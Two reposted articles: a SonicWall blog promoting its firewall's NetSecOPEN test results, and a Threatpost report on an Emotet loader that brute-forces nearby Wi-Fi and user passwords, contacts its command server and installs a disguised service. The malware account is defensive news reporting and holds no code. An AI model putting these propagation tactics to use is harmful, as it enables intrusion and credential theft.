To simplify this process and improve transparency in the cybersecurity market, NetSecOPEN announces SonicWall is one of only four security vendors to be certified in its 2020 NetSecOPEN Test Report.

Tested with 465 combined Public and Private Common Vulnerability and Exposure (CVE) vulnerabilities at the InterOperability Laboratory of the University of New Hampshire, the SonicWall NSa 4650 firewall achieved 100% security effectiveness against all private CVEs used in the test — CVEs unknown to NGFW vendors. Overall, SonicWall rated 99% when factoring in the results of the public CVE test.

“This apples-to-apples comparison provides security buyers with validation of real-world performance and security effectiveness of next-generation firewalls when fully configured for realistic conditions,” said Atul Dhablania, Senior Vice President and Chief Operating Officer, SonicWall, in the official announcement.

Testing firewalls in real-world conditions

The NetSecOPEN open standard is designed to simulate various permutations of real-world test conditions, specifically to address the challenges faced by security professionals when measuring and determining if the tested firewall is performing the way vendors had promised. The value of this service is maximized when test findings help you make clear and conclusive product decisions based on incontrovertible evidence.

SonicWall is among the first to excelled in one of the industry’s most comprehensive, rigorous benchmark tests ever created for NGFW. In summary, the NetSecOPEN Test Report reveals that the SonicWall NSa 4650 NFGW:

  • Demonstrated one of the highest security effectiveness ratings in the industry
  • Blocked 100% of attacks against all private vulnerabilities used in the test
  • Blocked 99% overall all attacks, private and public
  • Proved fast performance measured by NetSecOPEN at 3.5 Gbps of threat protection and up to 1.95 Gbps SSL decryption and inspection throughput
  • Affirmed its extremely high-performing and scalable enterprise security platform can meet the security and massive data and capacity demands of the largest of data centers
 
 

Firewall testing methodologies, metrics

Key performance indications (KPI), such as throughput, latency and other (see below) metrics, are important in determining products’ acceptability. These KPIs were recorded during NetSecOPEN testing using standard recommended firewall configurations and security features typically used in a real-world use case condition.

KPIMEANINGINTERPRETATION
CPSTCP Connections Per SecondMeasures the average established TCP connections per second in the sustaining period. For “TCP/HTTP(S) Connection Per Second” benchmarking test scenario, the KPI is measured average established and terminated TCP connections per second simultaneously.
TPUTThroughputMeasures the average Layer 2 throughput within the sustaining period as well as average packets per seconds within the same period. The value of throughput is expressed in Kbit/s.
TPSApplication Transactions Per SecondMeasures the average successfully completed application transactions per second in the sustaining period.
TTFBTime to First ByteMeasure the minimum, maximum and average time to first byte. TTFB is the elapsed time between sending the SYN packet from the client and receiving the first byte of application date from the DUT/SUT. TTFB SHOULD be expressed in millisecond.
TTLBTime to Last ByteMeasures the minimum, maximum and average per URL response time in the sustaining period. The latency is measured at Client and in this case would be the time duration between sending a GET request from Client and the receival of the complete response from the server.
CCConcurrent TCP ConnectionsMeasures the average concurrent open TCP connections in the sustaining period.

Importance of transparent testing of cybersecurity products

Before making an important business-critical purchase decision that is central to the cyber-defense of an organization, decision-makers likely spent countless days exercising due diligence. This may include conducting extensive vendor research, catching up on analyst opinions and insights, going through various online forums and communities, seeking peer recommendations and, more importantly, finding that one trustworthy third-party review that can help guide your purchase decision.

Unfortunately, locating such reviews can be a bewildering exercise as most third-party testing vendors and their methodologies are not well-defined nor do they follow established open standards and criteria for testing and benchmarking NGFW performance.

Recognizing the fact that customers often rely on third-party reviews to validate vendors’ claims, SonicWall joined NetSecOPEN in December 2018, the first industry organization focused on the creation of open, transparent network security performance testing standards adopted by the Internet Engineering Task Force (IETF), as one of its first founding member.

SonicWall recognizes NetSecOPEN for its reputation as an independent and unbiased product test and validation organization. We endorse its IETF initiative, open standards and benchmarking methodology for network security device performance.

As a contributing member, SonicWall actively works with NetSecOPEN and other members to help define, refine and establish repeatable and consistent testing procedures, parameters, configurations, measurements and KPIs to produce what NetSecOPEN declares as a fair and reasonable comparison across all network security functions. This should give organizations total transparency about cybersecurity vendors and their products’ performance.

 

Source :
https://blog.sonicwall.com/en-us/2020/02/sonicwall-firewall-certified-via-netsecopen-lab-testing-earns-perfect-score/

Emotet Now Hacks Nearby Wi-Fi Networks to Spread Like a Worm

The new tactic used by Emotet allows the malware to infect nearby insecure Wi-Fi networks – and their devices – via brute force loops.

A newly uncovered Emotet malware sample has the ability to spread to  insecure Wi-Fi networks that are located nearby to an infected device.

If the malware can spread to these nearby Wi-Fi networks, it then attempts to infect devices connected to them — a tactic that can rapidly escalate Emotet’s spread, said researchers. The new development is particularly dangerous for the already-prevalent Emotet malware, which since its return in September has taken on new evasion and social engineering tactics to steal credentials and spread trojans to victims (like the United Nations) .

“With this newly discovered loader-type used by Emotet, a new threat vector is introduced to Emotet’s capabilities,” said James Quinn, threat researcher and malware analyst for Binary Defense, in a Friday analysis. “Previously thought to only spread through malspam and infected networks, Emotet can use this loader-type to spread through nearby wireless networks if the networks use insecure passwords.”

While researchers noticed the Wi-Fi spreading binary being delivered for the first time on Jan. 23, they said that the executable has a timestamp of 4/16/2018, hinting that the Wi-Fi spreading behavior has been running unnoticed for almost two years. This may be in part due to how infrequently the binary is dropped, researchers said, as this is the first time they’ve seen it despite tracking Emotet since its return in 2019.

The Emotet sample first infects the initial system with a self-extracting RAR file, containing two binaries (worm.exe and service.exe) used for the Wi-Fi spreading. After the RAR file unpacks itself, Worm.exe executes automatically.

The worm.exe binary immediately begins profiling wireless networks in order to attempt to spread to other Wi-Fi networks. Emotet makes use of the wlanAPI interface to do this. wlanAPI is one of the libraries used by the native Wi-Fi application programming interface (API) to manage wireless network profiles and wireless network connections.

Once a Wi-Fi handle has been obtained, the malware then calls WlanEnumInterfaces, a function that enumerates all Wi-Fi networks currently available on the victims’ system. The function returns the enumerated wireless networks in a series of structures that contain all information related to them (including their SSID, signal, encryption and network authentication method).

Once the data for each network has been obtained, the malware moves into the connection with “brute-forcing loops.” Attackers use a password obtained from “internal password lists” (it’s not clear how this internal password list has been obtained) to attempt to make the connection. If the connection is not successful, the function loops and moves to the next password on the password list.

If the password is correct and the connection is successful, the malware sleeps for 14 seconds before sending an HTTP POST to its command-and-control (C2) server on port 8080, and establishes the connection to the Wi-Fi network.

Then, the binary begins enumerating and attempting to brute-force passwords for all users (including any Administrator accounts) on the newly-infected network. If any of these brute forces are successful, worm.exe then installs the other binary, service.exe, onto the infected devices. To gain persistence on the system, the binary is installed under the guise of “Windows Defender System Service” (WinDefService).

“With buffers containing either a list of all usernames successfully brute-forced and their passwords, or the administrator account and its password, worm.exe can now begin spreading service.exe to other systems,” said researchers. “Service.exe is the infected payload installed on remote systems by worm.exe. This binary has a PE timestamp of 01/23/2020, which was the date it was first found by Binary Defense.”

After service.exe is installed and communicates back to the C2, it begins dropping the embedded Emotet executable. In this manner, the malware attempts to infect as many devices as possible.

Emotet, which started as a banking trojan in 2014 and has continually evolved to become a full-service threat-delivery mechanism, can install a collection of malware on victim machines, including information stealers, email harvesters, self-propagation mechanisms and ransomware.

Researchers, for their part, recommend blocking this new Emotet technique with the use of strong passwords to secure wireless networks.

“Detection strategies for this threat include active monitoring of endpoints for new services being installed and investigating suspicious services or any processes running from temporary folders and user profile application data folders,” they said. “Network monitoring is also an effective detection, since the communications are unencrypted and there are recognizable patterns that identify the malware message content.”

Source :
https://threatpost.com/emotet-now-hacks-nearby-wi-fi-networks-to-spread-like-a-worm/152725/